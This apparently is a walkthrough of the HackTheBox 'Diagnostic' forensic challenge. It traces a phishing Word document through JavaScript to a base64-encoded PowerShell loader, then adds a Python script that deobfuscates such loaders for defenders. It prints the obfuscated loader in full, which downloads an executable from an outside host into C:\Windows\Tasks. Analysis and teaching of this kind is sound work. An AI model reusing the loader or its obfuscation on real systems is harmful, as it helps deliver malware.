We covered analyzing a sample Microsoft Office Word document with oletools to extract the relevant macros and links. The sample document contained a link that references a web page containing JavaScript code. The JS code contained a base64-encoded PowerShell command that calls out to an external domain to retrieve an executable file. This was part of the HackTheBox Diagnostic forensic challenge.

Our SOC has identified numerous phishing emails coming in claiming to have a document about an upcoming round of layoffs in the company. The emails all contain a link to diagnostic.htb/layoffs.doc. The DNS for that domain has since stopped resolving, but the server is still hosting the malicious document (your docker). Take a look and figure out what’s going on.

Video Highlights

  • We used oleid and oleobj to analyze the Word document named layoff.doc
  • The document contained an external link which references a web page that contained JavaScript
  • We used the ASCII table to convert the char[58] and char[34] values into their corresponding ASCII characters
  • We then used CyberChef to decode the base64, which produced the PowerShell below

${f`ile} = ("{7}{1}{6}{8}{5}{3}{2}{4}{0}"-f'}.exe','B{msDt_4s_A_pr0','E','r…s','3Ms_b4D','l3','toC','HT','0l_h4nD')

&("{1}{2}{0}{3}"-f'ues','Invoke','-WebReq','t') ("{2}{8}{0}{4}{6}{5}{3}{1}{7}"-f '://au','.htb/2','h','ic','to','agnost','mation.di','/n.exe','ttps') -OutFile "C:\Windows\Tasks\$file"

  • We used PowerShell to evaluate the format-operator expressions above, which yielded the challenge flag
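The three obfuscation tricks the walkthrough unpicks by hand (a base64-wrapped command, [char]N casts that smuggle ':' and '"' past string matching, and the -f format operator reassembling a string from shuffled fragments) can be resolved offline without ever running the loader. The script below is an added example for analysts, not code from the challenge or the original post. It uses the Invoke-WebRequest line quoted above as input, plus a constructed snippet (SAMPLE_CHAR_LINE, a placeholder example.invalid host) to show the [char]N handling; the regexes cover only the literal forms seen here (double-quoted format string, single-quoted arguments), which is an assumption about the sample rather than a general PowerShell parser.

```python
"""Resolve common PowerShell loader obfuscation statically (added example)."""
import base64
import re

# ("{1}{0}"-f'b','a') : a double-quoted format string followed by single-quoted args
FORMAT_RE = re.compile(
    r'''\(\s*"((?:\{\d+\})+)"\s*-f\s*('[^']*'(?:\s*,\s*'[^']*')*)\s*\)'''
)
# [char]58 style integer-to-character casts
CHAR_RE = re.compile(r"\[char\]\s*(\d+)", re.IGNORECASE)
# &"Verb-Noun" : the call operator applied to a string literal
CALL_RE = re.compile(r'&\s*"([^"]+)"')
URL_RE = re.compile(r"https?://[^\s\"')]+")

# Second line of the decoded payload quoted in the post (straight quotes).
PAGE_LINE = (
    r'''&("{1}{2}{0}{3}"-f'ues','Invoke','-WebReq','t') '''
    r'''("{2}{8}{0}{4}{6}{5}{3}{1}{7}"-f '://au','.htb/2','h','ic','to','agnost','mation.di','/n.exe','ttps') '''
    r'''-OutFile "C:\Windows\Tasks\$file"'''
)
# Constructed sample (not from the challenge) exercising [char]N casts.
SAMPLE_CHAR_LINE = '$u = "http" + [char]58 + "//example.invalid/x"; Write-Output ([char]34 + $u + [char]34)'
# Constructed: the same sample wrapped the way -EncodedCommand expects (UTF-16LE, base64).
SAMPLE_B64 = base64.b64encode(SAMPLE_CHAR_LINE.encode("utf-16-le")).decode()


def decode_encoded_command(b64: str) -> str:
    """Decode a base64 blob. -EncodedCommand payloads are UTF-16LE; text pasted
    into a web page is usually UTF-8. Heuristic: NUL bytes mean UTF-16LE."""
    raw = base64.b64decode(b64)
    return raw.decode("utf-16-le") if b"\x00" in raw else raw.decode("utf-8")


def _resolve_format(match: "re.Match[str]") -> str:
    """Reorder the single-quoted fragments according to the {n} placeholders."""
    fmt, raw_args = match.group(1), match.group(2)
    args = re.findall(r"'([^']*)'", raw_args)
    order = [int(i) for i in re.findall(r"\{(\d+)\}", fmt)]
    return '"' + "".join(args[i] for i in order) + '"'


def _resolve_char(match: "re.Match[str]") -> str:
    """Replace [char]N with a quoted literal, using single quotes for a double quote."""
    ch = chr(int(match.group(1)))
    return "'\"'" if ch == '"' else '"' + ch + '"'


def deobfuscate(command: str) -> str:
    """Apply the three rewrites; the result is readable but still not executed."""
    out = FORMAT_RE.sub(_resolve_format, command)
    out = CHAR_RE.sub(_resolve_char, out)
    out = CALL_RE.sub(lambda m: m.group(1), out)
    return out


def extract_urls(command: str) -> list:
    """Pull URLs out of a deobfuscated command for blocking / hunting."""
    return URL_RE.findall(deobfuscate(command))


if __name__ == "__main__":
    print(deobfuscate(PAGE_LINE))
    print(extract_urls(PAGE_LINE))
    print(deobfuscate(decode_encoded_command(SAMPLE_B64)))
```

The URLs returned by extract_urls are the indicators worth feeding to proxy logs and DNS telemetry; the deobfuscated command itself is what to compare against PowerShell script block logging (event 4104), which records the command after the format operator has already been evaluated.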

Video Walkthrough

About the Author

Cybersecurity trainer, MS in Cybersecurity, with expertise in the healthcare and finance industries; penetration tester and compliance auditor.

